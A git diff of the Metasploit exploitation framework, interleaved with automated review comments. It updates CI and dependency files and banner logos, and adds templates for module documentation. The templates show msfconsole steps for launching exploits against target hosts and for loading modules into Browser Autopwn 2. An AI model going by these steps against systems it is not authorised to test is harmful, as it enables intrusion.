diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md
new file mode 100644
index 0000000000..dfe8c50c1d
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,41 @@
+## Steps to reproduce
+
+How'd you do it?
+
+1. ...
+2. ...
+
+This section should also tell us any relevant information about the
+environment; for example, if an exploit that used to work is failing,
+tell us the victim operating system and service versions.
+
+## Expected behavior
+
+What should happen?
+
+## Current behavior
+
+What happens instead?
+
+You might also want to check the last ~1k lines of
+`/opt/metasploit/apps/pro/engine/config/logs/framework.log` or
+`~/.msf4/logs/framework.log` for relevant stack traces
+
+
+## System stuff
+
+### Metasploit version
+
+Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
+
+### I installed Metasploit with:
+- [ ] Kali package via apt
+- [ ] Omnibus installer (nightly)
+- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
+- [ ] Source install (please specify ruby version)
+
+### OS
+
+What OS are you running Metasploit on?
+
+
diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md
new file mode 100644
index 0000000000..cb977a9da4
--- /dev/null
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -0,0 +1,14 @@
+
+Tell us what this change does. If you're fixing a bug, please mention
+the github issue number.
+
+## Verification
+
+List the steps needed to make sure this thing works
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/windows/smb/ms08_067_netapi`
+- [ ] ...
+- [ ] **Verify** the thing does what it should
+- [ ] **Verify** the thing does not do what it should not
+
diff --git a/.gitignore b/.gitignore
index 532dcce24a..e83ddb0b91 100644
--- a/.gitignore
+++ b/.gitignore
@@ -68,6 +68,8 @@ external/source/exploits/**/Release # Avoid checking in Meterpreter binaries. These are supplied upstream by # the metasploit-payloads gem. data/meterpreter/*.dll +data/meterpreter/*.php +data/meterpreter/*.py data/meterpreter/*.bin data/meterpreter/*.jar data/meterpreter/*.lso diff --git a/.mailmap b/.mailmap index 05e09baf26..7ab2a7147d 100644 --- a/.mailmap +++ b/.mailmap 
@@ -1,45 +1,45 @@ -bcook-r7 -bcook-r7 Brent Cook -bturner-r7 Brandon Turner -cdoughty-r7 Chris Doughty -dheiland-r7 Deral Heiland -dmaloney-r7 David Maloney -dmaloney-r7 David Maloney -dmaloney-r7 dmaloney-r7 -dmohanty-r7 Dev Mohanty -dmohanty-r7 Dev Mohanty -dmohanty-r7 dmohanty-r7 -dmohanty-r7 dmohanty-r7 -ecarey-r7 Erran Carey -farias-r7 Fernando Arias -gmikeska-r7 Greg Mikeska -gmikeska-r7 Gregory Mikeska -hdm HD Moore -hdm HD Moore -hdm HD Moore -jhart-r7 Jon Hart -jlee-r7 # aka egypt -jlee-r7 -kgray-r7 Kyle Gray -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 Lance Sanchez -lsanchez-r7 darkbushido -lsato-r7 Louis Sato +acammack-r7 Adam Cammack +bcook-r7 +bcook-r7 Brent Cook +bturner-r7 Brandon Turner +bpatterson-r7 Brian Patterson +cdoughty-r7 Chris Doughty +dheiland-r7 Deral Heiland +dmaloney-r7 David Maloney +dmaloney-r7 David Maloney +dmaloney-r7 dmaloney-r7 +dmohanty-r7 Dev Mohanty +dmohanty-r7 Dev Mohanty +dmohanty-r7 dmohanty-r7 +dmohanty-r7 dmohanty-r7 +ecarey-r7 Erran Carey +farias-r7 Fernando Arias +gmikeska-r7 Greg Mikeska +gmikeska-r7 Gregory Mikeska +jhart-r7 Jon Hart +jlee-r7 # aka egypt +jlee-r7 +kgray-r7 Kyle Gray +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 Lance Sanchez +lsanchez-r7 darkbushido +lsato-r7 Louis Sato pdeardorff-r7 Paul Deardorff pdeardorff-r7 pdeardorff-r7 -sgonzalez-r7 Sonny Gonzalez -shuckins-r7 Samuel Huckins -todb-r7 Tod Beardsley -todb-r7 Tod Beardsley -todb-r7 Tod Beardsley -wchen-r7 # aka sinn3r -wchen-r7 -wvu-r7 William Vu -wvu-r7 William Vu -wvu-r7 William Vu -wvu-r7 wvu-r7 +sgonzalez-r7 Sonny Gonzalez +shuckins-r7 Samuel Huckins +todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +todb-r7 Tod Beardsley +wchen-r7 # aka sinn3r +wchen-r7 +wvu-r7 William Vu +wvu-r7 William Vu +wvu-r7 William Vu +wvu-r7 wvu-r7 +wwebb-r7 William Webb # Above this line are current Rapid7 employees. 
Below this paragraph are # volunteers, former employees, and potential Rapid7 employees who, at @@ -83,6 +83,9 @@ g0tmi1k g0tmi1k h0ng10 h0ng10 h0ng10 Hans-Martin Münch +hdm HD Moore +hdm HD Moore +hdm HD Moore jabra Josh Abraham jabra Joshua Abraham jcran @@ -111,6 +114,7 @@ m-1-k-3 Michael Messner Meatballs1 Meatballs1 mubix Rob Fuller +net-ninja Steven Seeley nevdull77 Patrik Karlsson nmonkee nmonkee nullbind nullbind diff --git a/.ruby-version b/.ruby-version index 04b10b4f15..63a1a1ca3c 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.1.7 +2.1.9 diff --git a/.travis.yml b/.travis.yml index 3e24267d3d..4d4c2e3576 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,11 +1,22 @@ +sudo: false +group: stable bundler_args: --without coverage development pcap cache: bundler +addons: + postgresql: '9.3' + apt: + packages: + - libpcap-dev + - graphviz +language: ruby +rvm: + - '2.1.8' + env: - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true - RAKE_TASKS=spec SPEC_OPTS="--tag content" - RAKE_TASKS=spec SPEC_OPTS="--tag ~content" -language: ruby matrix: fast_finish: true before_install: @@ -23,9 +34,6 @@ before_script: script: # fail build if db/schema.rb update is not committed - git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS -sudo: false -rvm: - - '2.1.7' notifications: irc: "irc.freenode.org#msfnotify" @@ -38,9 +46,3 @@ branches: except: - gh-pages - metakitty - -addons: - postgresql: '9.3' - apt: - packages: - - libpcap-dev diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 7fefad6647..c9ccb13e26 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -37,6 +37,7 @@ and Metasploit's [Common Coding Mistakes]. * **Do** follow the [50/72 rule] for Git commit messages. * **Don't** use the default merge messages when merging from other branches. * **Do** create a [topic branch] to work on instead of working directly on `master`. +* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT. ### Pull Requests 
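Review bot: The `rvm` entry added near the top of `.travis.yml` pins CI to `'2.1.8'`, while the `.ruby-version` change in this same commit moves the project to 2.1.9, so the build does not exercise the interpreter the repository tells developers to use. Pin the same patch release with `- '2.1.9'`, or, if the CI image cannot provide it yet, say so next to the entry with a comment such as `# CI lags .ruby-version until 2.1.9 is available on the build image`. Keeping the two in step matters because interpreter patch releases often carry fixes that the test run would otherwise never cover.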
diff --git a/Gemfile b/Gemfile index 9893680a4d..0a81128d1c 100755 --- a/Gemfile +++ b/Gemfile @@ -18,6 +18,9 @@ group :development do gem 'yard' # for development and testing purposes gem 'pry' + # module documentation + gem 'octokit', '~> 4.0' + # rails-upgrade staging gems end group :development, :test do diff --git a/Gemfile.lock b/Gemfile.lock index 1bcfd96d81..ca8cb66d75 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,30 +1,33 @@ PATH remote: . specs: - metasploit-framework (4.11.9) + metasploit-framework (4.11.21) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) bcrypt filesize - jsobfu (~> 0.3.0) + jsobfu (~> 0.4.1) json metasm (~> 1.0.2) - metasploit-concern (= 1.0.0) - metasploit-credential (= 1.0.1) - metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.22) - metasploit_data_models (= 1.2.10) + metasploit-concern + metasploit-credential (= 1.1.0) + metasploit-model (= 1.1.0) + metasploit-payloads (= 1.1.6) + metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) nokogiri + octokit openssl-ccm (= 1.2.1) packetfu (= 1.1.11) + patch_finder (>= 1.0.2) pcaprub pg (>= 0.11) railties rb-readline-r7 recog (= 2.0.14) + redcarpet robots rubyzip (~> 1.1) sqlite3 @@ -57,14 +60,15 @@ GEM multi_json (~> 1.3) thread_safe (~> 0.1) tzinfo (~> 0.3.37) + addressable (2.3.8) arel (4.0.2) - arel-helpers (2.1.1) - activerecord (= 4.0.13) + arel-helpers (2.2.0) + activerecord (>= 3.1.0, < 5) aruba (0.6.2) childprocess (>= 0.3.6) cucumber (>= 1.1.1) rspec-expectations (>= 2.7.0) - bcrypt (3.1.10) + bcrypt (3.1.11) builder (3.1.4) capybara (2.4.4) mime-types (>= 1.16) @@ -95,6 +99,8 @@ GEM factory_girl_rails (4.5.0) factory_girl (~> 4.5.0) railties (>= 3.0.0) + faraday (0.9.2) + multipart-post (>= 1.2, < 3) ffi (1.9.8) filesize (0.1.1) fivemat (1.3.2) 
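Review bot: The added comment `# rails-upgrade staging gems` sits directly before `end` with no gem declared under it, so it labels an empty section; drop it or move it to where staging gems are actually listed. Separately, `gem 'octokit', '~> 4.0'` is added to the `:development` group while the Gemfile.lock in this commit lists `octokit` under the metasploit-framework specs with no version constraint, so the gem appears to be declared in two places with different constraints. Keeping a single constrained declaration would make the dependency surface easier to audit. The `group :development` block starts outside the hunk.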
@@ -102,35 +108,35 @@ GEM multi_json (~> 1.3) hike (1.2.3) i18n (0.7.0) - jsobfu (0.3.0) + jsobfu (0.4.1) rkelly-remix (= 0.0.6) json (1.8.3) mail (2.6.3) mime-types (>= 1.16, < 3) metasm (1.0.2) - metasploit-concern (1.0.0) + metasploit-concern (1.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-credential (1.0.1) - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) - metasploit_data_models (~> 1.0) + metasploit-credential (1.1.0) + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) + metasploit_data_models (~> 1.3) pg railties rubyntlm rubyzip (~> 1.1) - metasploit-model (1.0.0) + metasploit-model (1.1.0) activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.22) - metasploit_data_models (1.2.10) + metasploit-payloads (1.1.6) + metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) arel-helpers - metasploit-concern (~> 1.0) - metasploit-model (~> 1.0) + metasploit-concern (~> 1.1) + metasploit-model (~> 1.1) pg postgres_ext railties (>= 4.0.9, < 4.1.0) @@ -139,20 +145,24 @@ GEM mime-types (2.6.1) mini_portile2 (2.0.0) minitest (4.7.5) - msgpack (0.7.1) + msgpack (0.7.4) multi_json (1.11.2) multi_test (0.1.2) + multipart-post (2.0.0) network_interface (0.0.1) nokogiri (1.6.7.2) mini_portile2 (~> 2.0.0.rc2) + octokit (4.2.0) + sawyer (~> 0.6.0, >= 0.5.3) openssl-ccm (1.2.1) packetfu (1.1.11) network_interface (~> 0.0) pcaprub (~> 0.12) - pcaprub (0.12.0) + patch_finder (1.0.2) + pcaprub (0.12.1) pg (0.18.4) pg_array_parser (0.0.9) - postgres_ext (2.4.1) + postgres_ext (3.0.0) activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) 
@@ -200,8 +210,11 @@ GEM rspec-mocks (~> 3.3.0) rspec-support (~> 3.3.0) rspec-support (3.3.0) - rubyntlm (0.5.2) - rubyzip (1.1.7) + rubyntlm (0.6.0) + rubyzip (1.2.0) + sawyer (0.6.0) + addressable (~> 2.3.5) + faraday (~> 0.8, < 0.10) shoulda-matchers (2.8.0) activesupport (>= 3.0.0) simplecov (0.9.2) @@ -238,6 +251,7 @@ DEPENDENCIES factory_girl_rails (~> 4.5.0) fivemat (~> 1.3.1) metasploit-framework! + octokit (~> 4.0) pry rake (>= 10.0.0) redcarpet diff --git a/config/cucumber.yml b/config/cucumber.yml index e3de143513..8cfb5f1a74 100644 --- a/config/cucumber.yml +++ b/config/cucumber.yml @@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets" %> default: <%= std_opts %> <%= ignored_tags %> features boot: <%= std_opts %> --tags @boot features +exploit: <%= std_opts %> --tags @targets features wip: --tags @wip:3 --wip features -rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip +rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip \ No newline at end of file diff --git a/config/database.yml.example b/config/database.yml.example index 060dd23625..b04aede6b0 100644 --- a/config/database.yml.example +++ b/config/database.yml.example @@ -1,9 +1,9 @@ -# Please only use postgresql bound to a TCP port. -# Only postgresql is supportable for metasploit-framework -# these days. (No SQLite, no MySQL). -# # To set up a metasploit database, follow the directions hosted at: # http://r-7.co/MSF-DEV#set-up-postgresql +# +# Kali Linux and the Omnibus installers both include an easy wrapper script for +# managing your database, which may be more convenient than rolling your own. + development: &pgsql adapter: postgresql database: metasploit_framework_development @@ -11,7 +11,7 @@ development: &pgsql password: __________________________________ host: localhost port: 5432 - pool: 5 + pool: 200 timeout: 5 # You will often want to seperate your databases between dev 
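Review bot: `pool: 200` in the `development` entry of `config/database.yml.example` raises the ActiveRecord pool from 5 to 200 without a comment, and a stock PostgreSQL server accepts only 100 connections by default (`max_connections`), so a heavily threaded session could be refused connections well before the pool limit is reached. Either choose a value below the server default or document the requirement next to the setting, for example `# pool must not exceed the server's max_connections (PostgreSQL default: 100)`. The `development` mapping continues outside the hunk, so other entries that inherit from `&pgsql` would pick up the same value.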
diff --git a/data/exploits/R7_2015_17/stream.raw b/data/exploits/R7_2015_17/stream.raw
new file mode 100644
index 0000000000..aa17f76ea2
Binary files /dev/null and b/data/exploits/R7_2015_17/stream.raw differ
diff --git a/data/logos/zsploit-1.txt b/data/logos/zsploit-1.txt
index 98cd8006bf..95d6f8cd24 100644
--- a/data/logos/zsploit-1.txt
+++ b/data/logos/zsploit-1.txt
@@ -1,11 +1,11 @@ -____________ - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|`?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] - [% .--------..-----.| |_ .---.-.|.,a$%|.-----.| |.-----.|__|| |_ %%] - [% ||| -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] - [% |__|__|__||_____||____||___._||%$P"`|| __||__||_____||__||____|%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%`"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] - [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] +%bld%blk ____________%whi + [%%%%%clr%%%%%%%%%bld%blk%%%%%%%%blk%%%%%%%%%%%%%| %red$a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%%clr%%%%%%%%%%bld%blk%%%%%%%%%%%%%%%%%%%%| %red$S`?a,%blk |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%%%clr%%%%%%%%bld%blk%%%%%%%%%%%%whi_%cya_%blk%%%%%%%%%%| %red`?a,%blk |%%%%%%%%%whi_%grn_%blk%%%%%%%%%%whi_%grn_%blk%%%whi_%grn_ %blk%%%%%whi] + [% .-%cya--%clr%cya-----.%bld%whi.-%cya-%clr%cya---.%bld%whi| %clr%cya|_ %bld%whi.-%cya-%clr%cya-.-.%bld%blk| %red.,a$%%blk|%whi.-%grn---%clr%grn-.%bld%whi| %clr%grn|%bld%whi.-%grn--%clr%grn--.%bld%whi|%grn_%clr%grn_|%bld%whi| %clr%grn|_ %bld%blk%%%whi] + [% | %clr%cya|%bld%whi| %clr%cya-__|%clr%cya| %clr%cya_|%bld%whi| %clr%cya_ |%bld%blk| %red,,aS$""`%blk |%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%whi| %clr%grn_ |%bld%grn| %clr%grn|%bld%grn| %clr%grn_|%bld%blk%%%whi] + [% %cya|%clr%cya__|__|__|%bld%cya|_%clr%cya____|%bld%cya|_%clr%cya___|%bld%cya|_%clr%cya__._|%bld%blk|%red%$P"`%blk |%grn| %clr%grn__|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn____|%bld%grn|_%clr%grn_|%bld%grn|_%clr%grn___|%bld%blk%%%bld%whi] + [%%clr%%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%| %red`"a,%blk |%clr%grn|__|%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + 
[%%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____%red`"a,$$%blk__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %red`"$%blk %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] + [%clr%%bld%blk%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%whi] diff --git a/data/logos/zsploit-2.txt b/data/logos/zsploit-2.txt index c95f49cbe9..48c6631edd 100644 --- a/data/logos/zsploit-2.txt +++ b/data/logos/zsploit-2.txt @@ -1,21 +1,20 @@ - - -.. - . - -dBBBBBBb dBBBP dBBBBBBP dBBBBBb .o -' dB'BBP - dB'dB'dB' dBBPdBPdBP BB - dB'dB'dB' dBPdBPdBP BB - dB'dB'dB' dBBBBP dBPdBBBBBBB - -dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP -..dB' dBP dB'.BP -|dBP dBBBB' dBP dB'.BP dBP dBP ---o-- dBP dBP dBP dB'.BP dBP dBP -|dBBBBP dBP dBBBBP dBBBBP dBP dBP - -. -. -oTo boldly shell were no -shell has gone before +%bld%whi + . . + . + + %bludBBBBBBb dBBBP dBBBBBBP dBBBBBb %whi. o + %blu ' dB' BBP + dB'dB'dB' dBBP dBP dBP BB + dB'dB'dB' dBP dBP dBP BB + dB'dB'dB' dBBBBP dBP dBBBBBBB + + %reddBBBBBP %bludBBBBBb dBP dBBBBP dBP dBBBBBBP + %whi. %cya. %bludB' dBP dB'.BP + %cya| %reddBP%blu dBBBB' dBP dB'.BP dBP dBP + %cya--o-- %reddBP%blu dBP dBP dB'.BP dBP dBP + %cya| %reddBBBBP%blu dBP dBBBBP dBBBBP dBP dBP%whi + + . + . + o %grnTo boldly go where no + shell has gone before diff --git a/data/logos/zsploit-3.txt b/data/logos/zsploit-3.txt index 35fd821a29..3a2c01931a 100644 --- a/data/logos/zsploit-3.txt +++ b/data/logos/zsploit-3.txt 
@@ -1,22 +1,21 @@ - -.,,.. -.\$$$$$L..,,==aaccaacc%#s$b.d8, d8P -d8P#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p -d888888P'7$$$$\""""''^^`` .7$$$|D*"'```?88' - d8bd8b.d8p d8888b ?88' d888b8b_.os#$|8*"` d8P?8b 88P - 88P`?P'?P d8b_,dP 88P d8P' ?88.oaS###S*"`d8P d8888b ?88b 88b - d88 d8 ?8 88b88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b -d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88 -.a#$$$$$$"`88b d8P 88b`?8888P' -,s$$$$$$$"`888888P' 88n_.,,,ass;: -.a$$$$$$$P`d88P' .,.ass%#S$$$$$$$$$$$$$$' -.a$###$$$P`_.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' -,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' -.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' -_______________________________________________________________ ,&$$$$$$'_____, - ll&&$$$$' -.;;lll&&&&' -...;;lllll&' -......;;;llll;;;.... -` ......;;;;... . . -` `` ` +%clr%bld%red + .,,. . + .\$$$$$L..,,==aaccaacc%#s$b. %whid%grn8, %whid8%grnP + %whid8%cyaP %red#$$$$$$$$$$$$$$$$$$$$$$$$$$$b. 
%whi`BP d88%grn8888p + %whid%cya888888P %red'7$$$$\""""''^^`` .7$$$|D*"'``` %whi?%grn88' + %whid8%cyabd8b.d8p %whid8%cya888b %whi?%cya88' %whid88%cya8b8b%red _.os#$|8*"` %whid8%grnP %whi?8%grnb 88P + %whi8%cya8P`?P'?P %whid8%cyab_,dP 88P %whid8%cyaP' ?88%red .oaS###S*"` %whid8%grnP %whid88%grn88b $whi?%grn88b 88b + %cyad88 d8 ?8 88b %whi8%cya8b 88b ,88b %red.osS$$$$*" %grn?88,.d88b, %whid%grn88 %whid%grn8P' ?88 88P `?8b +%cyad88' d88b 8b`?8888P'`?8b`?88P'%red.aS$$$$Q*"` %grn`?88' ?88 ?88 88b d88 d88%red + .a#$$$$$$"` %grn88b d8P 88b`?8888P'%red + ,s$$$$$$$"` %grn888888P' 88n%red _.,,,ass;: + .a$$$$$$$P` %grnd88P'%red .,.ass%#S$$$$$$$$$$$$$$' + .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' + ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' + .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' +%whi___________%clr_____________________________%bld%blk_______________________%red ,&$$$$$$'%blk_____%red + ll&&$$$$' + .;;lll&&&&' + ...;;lllll&' + ......;;;llll;;;.... + ` ......;;;;... . . diff --git a/data/markdown_doc/auxiliary_scanner_template.erb b/data/markdown_doc/auxiliary_scanner_template.erb new file mode 100644 index 0000000000..409a7c9970 --- /dev/null +++ b/data/markdown_doc/auxiliary_scanner_template.erb @@ -0,0 +1,29 @@ +This module is a scanner module, and is capable of testing against multiple hosts. + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` + +Other examples of setting the RHSOTS option: + +Example 1: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.3-192.168.1.200 +``` + +Example 2: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS 192.168.1.1/24 +``` + +Example 3: + +``` +msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS file:///tmp/ip_list.txt +``` 
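Review bot: One colour tag in the added zsploit-3 banner is written `$whi` instead of `%whi`, in the row containing `%whid88%grn88b $whi?%grn88b 88b`. Every other tag in the three banner files uses the `%` prefix, so the banner code presumably substitutes only that form, and the literal text `$whi` would be printed and shift the rest of the row. Change it to `%whi?%grn88b`. The hunk begins on an earlier line of this page.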
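Review bot: The sentence `Other examples of setting the RHSOTS option:` in auxiliary_scanner_template.erb misspells the option name. It should read `RHOSTS`, matching the `set RHOSTS` commands before and after it. Because this template is rendered into every scanner module's generated help, the typo would appear on each of those pages and defeat a text search for the option.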
diff --git a/data/markdown_doc/bes_demo_template.erb b/data/markdown_doc/bes_demo_template.erb
new file mode 100644
index 0000000000..21c130dae2
--- /dev/null
+++ b/data/markdown_doc/bes_demo_template.erb
@@ -0,0 +1,15 @@
+```
+msf > use <%= mod.fullname %>
+msf <%= mod.type %>(<%= mod.shortname %>) > run
+```
+
+This module is also supported by Browser Autopwn 2.
+
+To load it from Browser Autopwn 2, here's how:
+
+```
+msf > use auxiliary/server/browser_autopwn2
+msf auxiliary(browser_autopwn2) > set INCLUDE_PATTERN <%= mod.shortname %>
+INCLUDE_PATTERN => <%= mod.shortname %>
+msf auxiliary(browser_autopwn2) > exploit
+```
\ No newline at end of file
diff --git a/data/markdown_doc/default_template.erb b/data/markdown_doc/default_template.erb
new file mode 100644
index 0000000000..a771f07991
--- /dev/null
+++ b/data/markdown_doc/default_template.erb
@@ -0,0 +1,50 @@
+## <%= items[:mod_name] %>
+

+<%= normalize_description(items[:mod_description]) %> +

+ +## Module Name + +<%= Rex::Text.html_encode(items[:mod_fullname]) %> + +## Authors + +<%= normalize_authors(items[:mod_authors]) %> + +<% unless items[:mod_platforms].empty? %> +## Platforms +<%= normalize_platforms(items[:mod_platforms]) %> +<% end %> + +## Reliability + +<%= normalize_rank(items[:mod_rank]) %> + +## Related Pull Requests + +<%= normalize_pull_requests(items[:mod_pull_requests]) %> + +<% unless items[:mod_refs].empty? %> +## References + +<%= normalize_references(items[:mod_refs]) %> +<% end %> + +<% if items[:mod_targets] %> +## Available Targets + +<%= normalize_targets(items[:mod_targets]) %> + +<% end %> + +## Required Options + +<% if normalize_options(items[:mod_options]).empty? %> +No options required. +<% else %> +<%= normalize_options(items[:mod_options]) %> +<% end %> + +## Basic Usage + +<%= normalize_demo_output(items[:mod_demo]) %> \ No newline at end of file diff --git a/data/markdown_doc/generic_demo_template.erb b/data/markdown_doc/generic_demo_template.erb new file mode 100644 index 0000000000..fec7ccf244 --- /dev/null +++ b/data/markdown_doc/generic_demo_template.erb @@ -0,0 +1,9 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/html_template.erb b/data/markdown_doc/html_template.erb new file mode 100644 index 0000000000..ff5dbdcb08 --- /dev/null +++ b/data/markdown_doc/html_template.erb @@ -0,0 +1,54 @@ + + +<% unless kb.empty? %> + +<% end %> + + + +<% unless kb.empty? %> + + + + +
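Review bot: `## <%= items[:mod_name] %>` on the first line of default_template.erb writes the module name into the Markdown unescaped, while `items[:mod_fullname]` a few lines below goes through `Rex::Text.html_encode`; the two should be handled the same way, e.g. `## <%= Rex::Text.html_encode(items[:mod_name]) %>`. This matters because the result is later passed to `r.render(md)` in html_template.erb and opened as HTML, and both module metadata and the knowledge-base text rendered by `r.render(kb)` are contributor-supplied. The renderer's configuration is not visible in this diff; if it is Redcarpet's stock HTML renderer, consider enabling its `escape_html` (or `filter_html`) option so raw markup in a description or KB file is not emitted verbatim. The `normalize_*` helpers are defined outside this hunk, so whether they encode their output should be checked in the same pass.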
+
Overview +
+
Knowledge Base +
+

+<% end %> +
+<%= r.render(md) %> +
+<% unless kb.empty? %> +
+<%= r.render(kb) %> +
+<% end %> + + \ No newline at end of file diff --git a/data/markdown_doc/httpserver_demo_template.erb b/data/markdown_doc/httpserver_demo_template.erb new file mode 100644 index 0000000000..3d5737a95d --- /dev/null +++ b/data/markdown_doc/httpserver_demo_template.erb @@ -0,0 +1,4 @@ +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/localexploit_demo_template.erb b/data/markdown_doc/localexploit_demo_template.erb new file mode 100644 index 0000000000..e7ac42287c --- /dev/null +++ b/data/markdown_doc/localexploit_demo_template.erb @@ -0,0 +1,14 @@ +Note: To run a local exploit, make sure you are at the msf prompt. +Also, to check the session ID, use the ```sessions``` command. + + +``` +msf > use <%= mod.fullname %> +msf <%= mod.type %>(<%= mod.shortname %>) > show targets + ... a list of targets ... +msf <%= mod.type %>(<%= mod.shortname %>) > set TARGET target-id +msf <%= mod.type %>(<%= mod.shortname %>) > show options + ... show and set options ... +msf <%= mod.type %>(<%= mod.shortname %>) > set SESSION session-id +msf <%= mod.type %>(<%= mod.shortname %>) > exploit +``` \ No newline at end of file diff --git a/data/markdown_doc/markdown.css b/data/markdown_doc/markdown.css new file mode 100644 index 0000000000..abe2aec153 --- /dev/null +++ b/data/markdown_doc/markdown.css 
